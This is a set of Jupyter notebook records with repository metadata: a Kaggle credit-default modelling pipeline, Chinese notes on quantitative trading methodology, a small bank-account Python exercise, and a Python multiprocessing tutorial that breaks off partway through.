'PAYMENT_DIV_MIN': ['min', 'mean'],\n 'LATE_PAYMENT': ['max', 'sum'],\n}\n\ncc_agg = cc.groupby('SK_ID_CURR').agg(CREDIT_CARD_AGG)\ncc_agg.columns = pd.Index(['CC_' + e[0] + \"_\" + e[1].upper() for e in cc_agg.columns.tolist()])\ncc_agg.reset_index(inplace= True)", "_____no_output_____" ], [ "last_ids = cc.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()\nlast_months_df = cc[cc.index.isin(last_ids)]\ncc_agg = group_and_merge(last_months_df,cc_agg,'CC_LAST_', {'AMT_BALANCE': ['mean', 'max']})", "_____no_output_____" ], [ "CREDIT_CARD_TIME_AGG = {\n 'CNT_DRAWINGS_ATM_CURRENT': ['mean'],\n 'SK_DPD': ['max', 'sum'],\n 'AMT_BALANCE': ['mean', 'max'],\n 'LIMIT_USE': ['max', 'mean']\n}\n\nfor months in [12, 24, 48]:\n cc_prev_id = cc[cc['MONTHS_BALANCE'] >= -months]['SK_ID_PREV'].unique()\n cc_recent = cc[cc['SK_ID_PREV'].isin(cc_prev_id)]\n prefix = 'INS_{}M_'.format(months)\n cc_agg = group_and_merge(cc_recent, cc_agg, prefix, CREDIT_CARD_TIME_AGG)", "_____no_output_____" ], [ "df = pd.merge(df, cc_agg, on='SK_ID_CURR', how='left')\ndel cc, cc_agg; gc.collect()", "_____no_output_____" ], [ "def add_ratios_features(df):\n df['BUREAU_INCOME_CREDIT_RATIO'] = df['BUREAU_AMT_CREDIT_SUM_MEAN'] / df['AMT_INCOME_TOTAL']\n df['BUREAU_ACTIVE_CREDIT_TO_INCOME_RATIO'] = df['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM'] / df['AMT_INCOME_TOTAL']\n df['CURRENT_TO_APPROVED_CREDIT_MIN_RATIO'] = df['APPROVED_AMT_CREDIT_MIN'] / df['AMT_CREDIT']\n df['CURRENT_TO_APPROVED_CREDIT_MAX_RATIO'] = df['APPROVED_AMT_CREDIT_MAX'] / df['AMT_CREDIT']\n df['CURRENT_TO_APPROVED_CREDIT_MEAN_RATIO'] = df['APPROVED_AMT_CREDIT_MEAN'] / df['AMT_CREDIT']\n df['CURRENT_TO_APPROVED_ANNUITY_MAX_RATIO'] = df['APPROVED_AMT_ANNUITY_MAX'] / df['AMT_ANNUITY']\n df['CURRENT_TO_APPROVED_ANNUITY_MEAN_RATIO'] = df['APPROVED_AMT_ANNUITY_MEAN'] / df['AMT_ANNUITY']\n df['PAYMENT_MIN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MIN'] / df['AMT_ANNUITY']\n df['PAYMENT_MAX_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MAX'] / df['AMT_ANNUITY']\n df['PAYMENT_MEAN_TO_ANNUITY_RATIO'] = df['INS_AMT_PAYMENT_MEAN'] / df['AMT_ANNUITY']\n df['CTA_CREDIT_TO_ANNUITY_MAX_RATIO'] = df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MAX'] / df[\n 'CREDIT_TO_ANNUITY_RATIO']\n df['CTA_CREDIT_TO_ANNUITY_MEAN_RATIO'] = 
df['APPROVED_CREDIT_TO_ANNUITY_RATIO_MEAN'] / df[\n 'CREDIT_TO_ANNUITY_RATIO']\n df['DAYS_DECISION_MEAN_TO_BIRTH'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_BIRTH']\n df['DAYS_CREDIT_MEAN_TO_BIRTH'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_BIRTH']\n df['DAYS_DECISION_MEAN_TO_EMPLOYED'] = df['APPROVED_DAYS_DECISION_MEAN'] / df['DAYS_EMPLOYED']\n df['DAYS_CREDIT_MEAN_TO_EMPLOYED'] = df['BUREAU_DAYS_CREDIT_MEAN'] / df['DAYS_EMPLOYED']\n return df", "_____no_output_____" ], [ "df = add_ratios_features(df)", "_____no_output_____" ], [ "df.replace([np.inf, -np.inf], np.nan, inplace=True)", "_____no_output_____" ], [ "train = df[df['TARGET'].notnull()]\ntest = df[df['TARGET'].isnull()]\ndel df\ngc.collect()", "_____no_output_____" ], [ "labels = train['TARGET']\ntrain = train.drop(columns=['TARGET'])\ntest = test.drop(columns=['TARGET'])", "_____no_output_____" ], [ "feature = list(train.columns)\n\ntest_df = test.copy()\ntrain_df = train.copy()\ntrain_df['TARGET'] = labels", "_____no_output_____" ], [ "imputer = SimpleImputer(strategy = 'median')\nimputer.fit(train)\ntrain = imputer.transform(train)\ntest = imputer.transform(test)", "_____no_output_____" ], [ "scaler = MinMaxScaler(feature_range = (0, 1))\nscaler.fit(train)\ntrain = scaler.transform(train)\ntest = scaler.transform(test)", "_____no_output_____" ], [ "log_reg = LogisticRegression(C = 0.0001)\nlog_reg.fit(train, labels)", "_____no_output_____" ], [ "log_reg_pred = log_reg.predict_proba(test)[:, 1]", "_____no_output_____" ], [ "submit = test_df[['SK_ID_CURR']]\nsubmit['TARGET'] = log_reg_pred", "_____no_output_____" ], [ "submit.to_csv('log_reg.csv', index = False)", "_____no_output_____" ], [ "random_forest = RandomForestClassifier(n_estimators = 100, random_state = 50, verbose = 1, n_jobs = -1)\nrandom_forest.fit(train, labels)", "_____no_output_____" ], [ "predictions = random_forest.predict_proba(test)[:, 1]\ndel train, test\ngc.collect()", "_____no_output_____" ], [ "submit = test_df[['SK_ID_CURR']]\nsubmit['TARGET'] = predictions\ndel predictions\nsubmit.to_csv('random_forest.csv', index = False)\ndel submit\ngc.collect()", "_____no_output_____" ], [ "# Ref: https://pranaysite.netlify.app/lightgbm/\n\ndef model(features, test_features, encoding = 'ohe', n_folds = 5):\n \n \"\"\"Train and test a light gradient boosting model using\n cross validation. \n \n Parameters\n --------\n features (pd.DataFrame): \n dataframe of training features to use \n for training a model. Must include the TARGET column.\n test_features (pd.DataFrame): \n dataframe of testing features to use\n for making predictions with the model. \n encoding (str, default = 'ohe'): \n method for encoding categorical variables. 
Either 'ohe' for one-hot encoding or 'le' for integer label encoding\n n_folds (int, default = 5): number of folds to use for cross validation\n \n Return\n --------\n submission (pd.DataFrame): \n dataframe with `SK_ID_CURR` and `TARGET` probabilities\n predicted by the model.\n feature_importances (pd.DataFrame): \n dataframe with the feature importances from the model.\n valid_metrics (pd.DataFrame): \n dataframe with training and validation metrics (ROC AUC) for each fold and overall.\n \n \"\"\"\n \n # Extract the ids\n train_ids = features['SK_ID_CURR']\n test_ids = test_features['SK_ID_CURR']\n \n # Extract the labels for training\n labels = features['TARGET']\n \n # Remove the ids and target\n features = features.drop(columns = ['SK_ID_CURR', 'TARGET'])\n test_features = test_features.drop(columns = ['SK_ID_CURR'])\n \n \n # One Hot Encoding\n if encoding == 'ohe':\n features = pd.get_dummies(features)\n test_features = pd.get_dummies(test_features)\n \n # Align the dataframes by the columns\n features, test_features = features.align(test_features, join = 'inner', axis = 1)\n \n # No categorical indices to record\n cat_indices = 'auto'\n \n # Integer label encoding\n elif encoding == 'le':\n \n # Create a label encoder\n label_encoder = LabelEncoder()\n \n # List for storing categorical indices\n cat_indices = []\n \n # Iterate through each column\n for i, col in enumerate(features):\n if features[col].dtype == 'object':\n # Map the categorical features to integers\n features[col] = label_encoder.fit_transform(np.array(features[col].astype(str)).reshape((-1,)))\n test_features[col] = label_encoder.transform(np.array(test_features[col].astype(str)).reshape((-1,)))\n\n # Record the categorical indices\n cat_indices.append(i)\n \n # Catch error if label encoding scheme is not valid\n else:\n raise ValueError(\"Encoding must be either 'ohe' or 'le'\")\n \n print('Training Data Shape: ', features.shape)\n print('Testing Data Shape: ', test_features.shape)\n \n # Extract feature names\n feature_names = list(features.columns)\n \n # Convert to np arrays\n features = np.array(features)\n test_features = np.array(test_features)\n \n # Create the kfold object\n k_fold = KFold(n_splits = n_folds, shuffle = True, random_state = 50)\n \n # Empty array for feature importances\n feature_importance_values = np.zeros(len(feature_names))\n \n # Empty array for test predictions\n test_predictions = np.zeros(test_features.shape[0])\n \n # Empty array for out of fold validation predictions\n out_of_fold = np.zeros(features.shape[0])\n \n # Lists for recording validation and training scores\n valid_scores = []\n train_scores = []\n \n # Iterate through each fold\n for train_indices, valid_indices in k_fold.split(features):\n \n # Training data for the fold\n train_features, train_labels = features[train_indices], labels[train_indices]\n # Validation data for the fold\n valid_features, valid_labels = features[valid_indices], labels[valid_indices]\n \n # Create the model\n model = lgb.LGBMClassifier(n_estimators=10000, objective = 'binary', \n class_weight = 'balanced', learning_rate = 0.05, \n reg_alpha = 0.1, reg_lambda = 0.1, \n subsample = 0.8, n_jobs = -1, random_state = 50)\n \n # Train the model\n model.fit(train_features, train_labels, eval_metric = 'auc',\n eval_set = [(valid_features, valid_labels), (train_features, train_labels)],\n eval_names = ['valid', 'train'], categorical_feature = cat_indices,\n early_stopping_rounds = 100, verbose = 200)\n \n # Record the best iteration\n best_iteration 
= model.best_iteration_\n \n # Record the feature importances\n feature_importance_values += model.feature_importances_ / k_fold.n_splits\n \n # Make predictions\n test_predictions += model.predict_proba(test_features, num_iteration = best_iteration)[:, 1] / k_fold.n_splits\n \n # Record the out of fold predictions\n out_of_fold[valid_indices] = model.predict_proba(valid_features, num_iteration = best_iteration)[:, 1]\n \n # Record the best score\n valid_score = model.best_score_['valid']['auc']\n train_score = model.best_score_['train']['auc']\n \n valid_scores.append(valid_score)\n train_scores.append(train_score)\n \n # Clean up memory\n gc.enable()\n del model, train_features, valid_features\n gc.collect()\n \n # Make the submission dataframe\n submission = pd.DataFrame({'SK_ID_CURR': test_ids, 'TARGET': test_predictions})\n \n # Make the feature importance dataframe\n feature_importances = pd.DataFrame({'feature': feature_names, 'importance': feature_importance_values})\n \n # Overall validation score\n valid_auc = roc_auc_score(labels, out_of_fold)\n \n # Add the overall scores to the metrics\n valid_scores.append(valid_auc)\n train_scores.append(np.mean(train_scores))\n \n # Needed for creating dataframe of validation scores\n fold_names = list(range(n_folds))\n fold_names.append('overall')\n \n # Dataframe of validation scores\n metrics = pd.DataFrame({'fold': fold_names,\n 'train': train_scores,\n 'valid': valid_scores}) \n \n return submission, feature_importances, metrics", "_____no_output_____" ], [ "submission, fi, metrics = model(train_df, test_df, n_folds=5)\nprint('LightGBM metrics')\nprint(metrics)", "_____no_output_____" ], [ "def plot_feature_importances(df):\n \"\"\"\n Plot importances returned by a model. This can work with any measure of\n feature importance provided that higher importance is better. \n \n Args:\n df (dataframe): feature importances. 
Must have the features in a column\n called `features` and the importances in a column called `importance\n \n Returns:\n shows a plot of the 15 most importance features\n \n df (dataframe): feature importances sorted by importance (highest to lowest) \n with a column for normalized importance\n \"\"\"\n \n # Sort features according to importance\n df = df.sort_values('importance', ascending = False).reset_index()\n \n # Normalize the feature importances to add up to one\n df['importance_normalized'] = df['importance'] / df['importance'].sum()\n\n # Make a horizontal bar chart of feature importances\n plt.figure(figsize = (10, 6))\n ax = plt.subplot()\n \n # Need to reverse the index to plot most important on top\n ax.barh(list(reversed(list(df.index[:15]))), \n df['importance_normalized'].head(15), \n align = 'center', edgecolor = 'k')\n \n # Set the yticks and labels\n ax.set_yticks(list(reversed(list(df.index[:15]))))\n ax.set_yticklabels(df['feature'].head(15))\n \n # Plot labeling\n plt.xlabel('Normalized Importance'); plt.title('Feature Importances')\n plt.show()\n \n return df", "_____no_output_____" ], [ "fi_sorted = plot_feature_importances(fi)", "_____no_output_____" ], [ "submission.to_csv('lgb.csv', index = False)\ndel submission, fi, fi_sorted, metrics\ngc.collect()", "_____no_output_____" ], [ "train_values = labels\ntrain_id = train_df['SK_ID_CURR']\ntest_id = test_df['SK_ID_CURR']\n\ntrain_df_xg = train_df.copy()\ntest_df_xg = test_df.copy()\n\ntrain_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)\ntest_df_xg.drop('SK_ID_CURR', inplace=True, axis=1)\n\ntrain_df_xg, test_df_xg = train_df_xg.align(test_df_xg, join = 'inner', axis = 1)\n\nratio = (train_values == 0).sum()/ (train_values == 1).sum()\ndel train_df, test_df\ngc.collect()", "_____no_output_____" ], [ "X_train, X_test, y_train, y_test = train_test_split(train_df_xg, train_values, test_size=0.2, stratify=train_values, random_state=1)", "_____no_output_____" ], [ "clf = XGBClassifier(n_estimators=1200, objective='binary:logistic', gamma=0.098, subsample=0.5, scale_pos_weight=ratio )\nclf.fit(X_train, y_train, eval_set=[(X_test, y_test)], eval_metric='auc', early_stopping_rounds=10)", "_____no_output_____" ], [ "predictions = clf.predict_proba(test_df_xg.values)[:, 1]\nsubmission = pd.DataFrame({'SK_ID_CURR': test_id.values, 'TARGET': predictions})\nsubmission.to_csv('xgboost.csv', index = False)", "_____no_output_____" ], [ "!kaggle competitions submit home-credit-default-risk -f lgb.csv -m \"Notebook Home Credit Loan | v6 | LightGBM\"", "_____no_output_____" ], [ "#!kaggle competitions submit home-credit-default-risk -f xgboost.csv -m \"Notebook Home Credit Loan | v5 | XGBoost\"", "_____no_output_____" ], [ "#!kaggle competitions submit home-credit-default-risk -f log_reg.csv -m \"Notebook Home Credit Loan | v5 | LogisticRegression\"", "_____no_output_____" ], [ "#!kaggle competitions submit home-credit-default-risk -f random_forest.csv -m \"Notebook Home Credit Loan | v5 | RandomForest\"", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1ca390906eab7c317f4a20640a5dff9f104f95
4,971
ipynb
Jupyter Notebook
Finance/见识.ipynb
Yanie1asdfg/Quant-Lectures
4e4b84cf2aff290b715a7924277335a23f5e8168
[ "MIT" ]
6
2020-12-29T07:53:46.000Z
2022-01-17T07:07:54.000Z
Finance/.ipynb_checkpoints/见识-checkpoint.ipynb
Yanie1asdfg/Quant-Lectures
4e4b84cf2aff290b715a7924277335a23f5e8168
[ "MIT" ]
null
null
null
Finance/.ipynb_checkpoints/见识-checkpoint.ipynb
Yanie1asdfg/Quant-Lectures
4e4b84cf2aff290b715a7924277335a23f5e8168
[ "MIT" ]
4
2020-12-28T03:11:26.000Z
2021-02-09T06:12:51.000Z
25.106061
160
0.456447
[ [ [ "- 广发证券之《深度学习之股指期货日内交易策略》 \n- 《宽客人生》\n- 《主动投资组合管理》\n- \n\n-------------------------------------------------------", "_____no_output_____" ], [ "量化研报只是应付客户而做的产物,对于实际交易用处不大 \n策略对于市场的参数时刻都在变化 \n策略+相应的参数调整才是完整的 \n策略本身也需要非常强的主观调整 ----------周杰 \n拿到一个静态的策略并不是一个万能钥匙,对于细节处没多大用处,挣钱完全是靠细节 \n世界不存在一种一成不变的交易体系能让你永远的挣钱 \n-------------------------------------------------------", "_____no_output_____" ], [ "**量化体系:** \n定价体系:BSM期权定价,基于基本面的股票定价...... \n因子体系:来源与CAPM理论,通过将信号元做线性回归来提供信息量 \n产品体系:最常见的FOF,MOM \n套利体系:通过协整的手段形成的一系列的策略 \n固收体系:基于收益率衍生概念对货币、外汇、债券市场的交易 \n高频体系:基于市场微观结构的验证 \n深度学习不是一个单独的策略系统,而是一种研究方法\n\n----------------------------------------------------------------------", "_____no_output_____" ], [ "--->理论先行 \n--->拒绝信息素元 \n--->连续 & 收敛 \n--->市场不完全 \n--->预测性与表征性 \n--->策略的证伪方式 \n--->策略陷阱\n\n* 量化交易不是计算机视角下的数字结果,而事实是,量化交易扎根于理论之中\n* 信息的发掘和使用构成了交易整体的具体思路\n* 信息素元是指市场无法再被细分的信息元\n* 信息元连续且收敛,挖掘因子时,连续指在一段时间内因子连续有效或连续无效,连续的过程可能不是线性的\n* 收敛是指单方向放大或缩小因子,必须在某个地方达到极值,不要求是单调的,但必须达到极值,调大一点,效果好一点,再调大一点,效果再好一点,当跳到某个值的时候,没效果了,即出现极值收敛了,不能出现因子无限大,收益无限大的情况,这种因子一定是错的\n* 所有的有效的信息元全部都是连续且收敛的\n* 市场不完全\n* 真正有效的因子是机密,一定不要是市场都知道的东西,一个很有趣的例子:运用当天的第一根K线预测当天的涨跌幅(这个因子肯定无效)\n* 天气一热,大街上的小姑凉穿裙子比较多,但不能通过大街上穿裙子的姑凉人数来预测明天的温度,温度与穿裙子女生的人数只有表征性,严格的区分这一点\n\n* 函数的单调性:函数的单调性(monotonicity)也可以叫做函数的增减性。当函数 f(x) 的自变量在其定义区间内增大(或减小)时,函数值f(x)也随着增大(或减小),则称该函数为在该区间上具有单调性。\n* 函数的连续性:连续函数是指函数y=f(x)当自变量x的变化很小时,所引起的因变量y的变化也很小。因变量关于自变量是连续变化的,连续函数在直角坐标系中的图像是一条没有断裂的连续曲线。\n-----------------------------------------------------------------------------------------", "_____no_output_____" ], [ "**量化交易的研究方法论** \n\n一切接套路 \n\n方法论意味着你的工作步骤与要求,可以理解为一个操作手册,在任一体系下每时每刻应该干什么\n\n清楚了方法论,就知道每天每时每刻该干什么,但是市场上没有任何一本书,任何一门课程讲量化研究方法论的,都是每个人总结的\n\n在研究的过程中,一定要把方法论放在前面,会让你少走很多弯路\n\n----------------------------------------------------------------------------------------------------------------------------------------------------------", "_____no_output_____" ], [ "**套利** \n内因套利\n* 期限套 \n* 跨期套 \n* 跨市场套 \n* 产业链套 \n\n关联套\n* 跨品种套\n* 衍生品套\n\n1.计算cu 和 ni的历史价格线性关系 \n2.给定一个显著性水平,通常选取**α**=5% \n3.假设其残差服从正态分布,并计算置信区间 \n4.置信区间上下限作为交易开仓的阈值 \n5.突破置信区间上限开仓做空,突破下限开仓做多 \n\n均值回归 \n极值捕捉\n---------------------------------------------------------------------", "_____no_output_____" ], [ "做量化的人没有止盈,没有止损 \n策略必须是一个严格的闭环,当前的亏损有没有超出模型的空间 \n止盈止损是主观交易法,在量化层面止盈止损是个伪命题 \n做的交易要在下单之前明确赢的可能性有多大,亏损的可能性有多大,整体的期望有多大 \n涨跌的概率之前要算清楚了才叫量化,这个可以是概率,可以是分布\n--------------------------------------------", "_____no_output_____" ], [ "**数学方面的学习:** \n* 随机过程分析\n* 时间序列\n* AI \n\n形成自己的哲学基石 \n\n-------------------------------------------------------------", "_____no_output_____" ], [ "**黑白天鹅** \n能够观察到的风险都是白天鹅 \n原油负价格从未出现之前它是黑天鹅,出现之后就不是了 \n明天外星人入侵地球,这是黑天鹅 \n黑天鹅应该在风控的层面考虑,而不是在策略层面考虑 \n-------------------------------------------------------------", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1ca8ff0f2e439294db0d0cb87561fbb21f4f79
2,551
ipynb
Jupyter Notebook
OOP_58003_LONG_QUIZ.ipynb
IanReyes2/OOP-58003
26fb8e4ef925814404e1397400a49779e2d36b94
[ "Apache-2.0" ]
null
null
null
OOP_58003_LONG_QUIZ.ipynb
IanReyes2/OOP-58003
26fb8e4ef925814404e1397400a49779e2d36b94
[ "Apache-2.0" ]
null
null
null
OOP_58003_LONG_QUIZ.ipynb
IanReyes2/OOP-58003
26fb8e4ef925814404e1397400a49779e2d36b94
[ "Apache-2.0" ]
null
null
null
26.852632
235
0.454724
[ [ [ "<a href=\"https://colab.research.google.com/github/IanReyes2/OOP-58003/blob/main/OOP_58003_LONG_QUIZ.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "Bank Account", "_____no_output_____" ] ], [ [ "class Bank_Account:\n def __init__(self):\n self.balance=0\n print(\"YIEEE may sweldo na sya\")\n\n name = input(\"Enter your name: \")\n print(\"\")\n\n AccountNumber = input(\"Enter your number: \")\n print(\"Welcome Ian!\")\n\n def deposit(self):\n amount=float(input(\"Enter amount to be deposited: \"))\n self.balance += amount\n \n print(\"Amount Deposited: \",amount)\n\n def display(self):\n print(\"Net Available Balance=\",self.balance)\n\n\ns = Bank_Account()\n\ns.deposit()\ns.display()", "Enter your name: Ian\n\nEnter your number: 123456789\nWelcome Ian!\nYIEEE may sweldo na sya\nEnter amount to be deposited: 1234\nAmount Deposited: 1234.0\nNet Available Balance= 1234.0\n" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ] ]
cb1caa0c204f6f6ff17bc9292e326ce2e1e8493a
27,446
ipynb
Jupyter Notebook
concurrency/multiprocessing/Passing_Messages_to_Processes.ipynb
scotthuang1989/Python-3-Module-of-the-Week
5f45f4602f084c899924ebc9c6b0155a6dc76f56
[ "Apache-2.0" ]
2
2018-09-17T05:52:12.000Z
2021-11-09T17:19:29.000Z
concurrency/multiprocessing/Passing_Messages_to_Processes.ipynb
scotthuang1989/Python-3-Module-of-the-Week
5f45f4602f084c899924ebc9c6b0155a6dc76f56
[ "Apache-2.0" ]
null
null
null
concurrency/multiprocessing/Passing_Messages_to_Processes.ipynb
scotthuang1989/Python-3-Module-of-the-Week
5f45f4602f084c899924ebc9c6b0155a6dc76f56
[ "Apache-2.0" ]
2
2017-10-18T09:01:27.000Z
2018-08-22T00:41:22.000Z
29.043386
509
0.508963
[ [ [ "## Passing Messages to Processes", "_____no_output_____" ], [ "As with threads, a common use pattern for multiple processes is to divide a job up among several workers to run in parallel. Effective use of multiple processes usually requires some communication between them, so that work can be divided and results can be aggregated. A simple way to communicate between processes with multiprocessing is to use a Queue to pass messages back and forth. **Any object that can be serialized with pickle can pass through a Queue.**", "_____no_output_____" ] ], [ [ "import multiprocessing\n\n\nclass MyFancyClass:\n\n def __init__(self, name):\n self.name = name\n\n def do_something(self):\n proc_name = multiprocessing.current_process().name\n print('Doing something fancy in {} for {}!'.format(\n proc_name, self.name))\n\n\ndef worker(q):\n obj = q.get()\n obj.do_something()\n\n\nif __name__ == '__main__':\n queue = multiprocessing.Queue()\n\n p = multiprocessing.Process(target=worker, args=(queue,))\n p.start()\n\n queue.put(MyFancyClass('Fancy Dan'))\n\n # Wait for the worker to finish\n queue.close()\n queue.join_thread()\n p.join()", "Doing something fancy in Process-2 for Fancy Dan!\n" ] ], [ [ "A more complex example shows how to manage several workers consuming data from a JoinableQueue and passing results back to the parent process. The poison pill technique is used to stop the workers. After setting up the real tasks, the main program adds one “stop” value per worker to the job queue. When a worker encounters the special value, it breaks out of its processing loop. The main process uses the task queue’s join() method to wait for all of the tasks to finish before processing the results.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport time\n\n\nclass Consumer(multiprocessing.Process):\n\n def __init__(self, task_queue, result_queue):\n multiprocessing.Process.__init__(self)\n self.task_queue = task_queue\n self.result_queue = result_queue\n\n def run(self):\n proc_name = self.name\n while True:\n next_task = self.task_queue.get()\n if next_task is None:\n # Poison pill means shutdown\n print('{}: Exiting'.format(proc_name))\n self.task_queue.task_done()\n break\n print('{}: {}'.format(proc_name, next_task))\n answer = next_task()\n self.task_queue.task_done()\n self.result_queue.put(answer)\n\n\nclass Task:\n\n def __init__(self, a, b):\n self.a = a\n self.b = b\n\n def __call__(self):\n time.sleep(0.1) # pretend to take time to do the work\n return '{self.a} * {self.b} = {product}'.format(\n self=self, product=self.a * self.b)\n\n def __str__(self):\n return '{self.a} * {self.b}'.format(self=self)\n\n\nif __name__ == '__main__':\n # Establish communication queues\n tasks = multiprocessing.JoinableQueue()\n results = multiprocessing.Queue()\n\n # Start consumers\n num_consumers = multiprocessing.cpu_count() * 2\n print('Creating {} consumers'.format(num_consumers))\n consumers = [\n Consumer(tasks, results)\n for i in range(num_consumers)\n ]\n for w in consumers:\n w.start()\n\n # Enqueue jobs\n num_jobs = 10\n for i in range(num_jobs):\n tasks.put(Task(i, i))\n\n # Add a poison pill for each consumer\n for i in range(num_consumers):\n tasks.put(None)\n\n # Wait for all of the tasks to finish\n tasks.join()\n\n # Start printing results\n while num_jobs:\n result = results.get()\n print('Result:', result)\n num_jobs -= 1", "Creating 16 consumers\nConsumer-5: 2 * 2\nConsumer-3: 0 * 0\nConsumer-6: 3 * 3\nConsumer-8: 5 * 5\nConsumer-9: 6 * 6\nConsumer-4: 1 * 1\nConsumer-11: 
8 * 8\nConsumer-18: 4 * 4\nConsumer-16: Exiting\nConsumer-12: 9 * 9\nConsumer-17: Exiting\nConsumer-7: 7 * 7\nConsumer-14: Exiting\nConsumer-15: Exiting\nConsumer-10: Exiting\nConsumer-13: Exiting\nConsumer-3: Exiting\nConsumer-5: Exiting\nConsumer-6: Exiting\nConsumer-11: Exiting\nConsumer-8: Exiting\nConsumer-9: Exiting\nConsumer-4: Exiting\nConsumer-12: Exiting\nConsumer-18: Exiting\nConsumer-7: Exiting\nResult: 0 * 0 = 0\nResult: 2 * 2 = 4\nResult: 8 * 8 = 64\nResult: 3 * 3 = 9\nResult: 6 * 6 = 36\nResult: 5 * 5 = 25\nResult: 1 * 1 = 1\nResult: 9 * 9 = 81\nResult: 4 * 4 = 16\nResult: 7 * 7 = 49\n" ] ], [ [ "## Signaling between Processes", "_____no_output_____" ], [ "The Event class provides a simple way to communicate state information between processes. An event can be toggled between set and unset states. Users of the event object can wait for it to change from unset to set, using an optional timeout value.\n\n", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport time\n\n\ndef wait_for_event(e):\n \"\"\"Wait for the event to be set before doing anything\"\"\"\n print('wait_for_event: starting')\n e.wait()\n print('wait_for_event: e.is_set()->', e.is_set())\n\n\ndef wait_for_event_timeout(e, t):\n \"\"\"Wait t seconds and then timeout\"\"\"\n print('wait_for_event_timeout: starting')\n e.wait(t)\n print('wait_for_event_timeout: e.is_set()->', e.is_set())\n\n\nif __name__ == '__main__':\n e = multiprocessing.Event()\n w1 = multiprocessing.Process(\n name='block',\n target=wait_for_event,\n args=(e,),\n )\n w1.start()\n\n w1 = multiprocessing.Process(\n name='block',\n target=wait_for_event,\n args=(e,),\n )\n w1.start()\n\n \n w2 = multiprocessing.Process(\n name='nonblock',\n target=wait_for_event_timeout,\n args=(e, 2),\n )\n w2.start()\n\n print('main: waiting before calling Event.set()')\n time.sleep(3)\n e.set()\n print('main: event is set')", "wait_for_event: starting\nwait_for_event: starting\nwait_for_event_timeout: starting\nmain: waiting before calling Event.set()\nwait_for_event_timeout: e.is_set()-> False\nmain: event is set\nwait_for_event: e.is_set()-> True\nwait_for_event: e.is_set()-> True\n" ] ], [ [ "* When wait() times out it returns without an error. 
The caller is responsible for checking the state of the event using is_set().\n\n* a event.set() will set off all process that are waiting for this event", "_____no_output_____" ], [ "## Controlling Access to Resources", "_____no_output_____" ], [ "In situations when a single resource needs to be shared between multiple processes, a Lock can be used to avoid conflicting accesses.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport sys\n\n\ndef worker_with(lock, stream):\n with lock:\n stream.write('Lock acquired via with\\n')\n\n\ndef worker_no_with(lock, stream):\n lock.acquire()\n try:\n stream.write('Lock acquired directly\\n')\n finally:\n lock.release()\n\n\nlock = multiprocessing.Lock()\nw = multiprocessing.Process(\n target=worker_with,\n args=(lock, sys.stdout),\n)\nnw = multiprocessing.Process(\n target=worker_no_with,\n args=(lock, sys.stdout),\n)\n\nw.start()\nnw.start()\n\nw.join()\nnw.join()", "Lock acquired via with\nLock acquired directly\n" ] ], [ [ "## Synchronizing Operations", "_____no_output_____" ], [ "### Condition", "_____no_output_____" ], [ "Condition objects can be used to synchronize parts of a workflow so that some run in parallel but others run sequentially, even if they are in separate processes.", "_____no_output_____" ] ], [ [ "import multiprocessing\nimport time\n\n\ndef stage_1(cond):\n \"\"\"perform first stage of work,\n then notify stage_2 to continue\n \"\"\"\n name = multiprocessing.current_process().name\n print('Starting', name)\n with cond:\n print('{} done and ready for stage 2'.format(name))\n cond.notify_all()\n\n\ndef stage_2(cond):\n \"\"\"wait for the condition telling us stage_1 is done\"\"\"\n name = multiprocessing.current_process().name\n print('Starting', name)\n with cond:\n cond.wait()\n print('{} running'.format(name))\n\n\nif __name__ == '__main__':\n condition = multiprocessing.Condition()\n s1 = multiprocessing.Process(name='s1',\n target=stage_1,\n args=(condition,))\n s2_clients = [\n multiprocessing.Process(\n name='stage_2[{}]'.format(i),\n target=stage_2,\n args=(condition,),\n )\n for i in range(1, 3)\n ]\n\n for c in s2_clients:\n c.start()\n time.sleep(1)\n s1.start()\n\n s1.join()\n for c in s2_clients:\n c.join()", "Starting stage_2[1]\nStarting stage_2[2]\nStarting s1\ns1 done and ready for stage 2\nstage_2[2] running\nstage_2[1] running\n" ] ], [ [ "In this example, two process run the second stage of a job in parallel, but only after the first stage is done.", "_____no_output_____" ], [ "## Controlling Concurrent Access to Resources", "_____no_output_____" ], [ "Sometimes it is useful to allow more than one worker access to a resource at a time, while still limiting the overall number. For example, a connection pool might support a fixed number of simultaneous connections, or a network application might support a fixed number of concurrent downloads. 
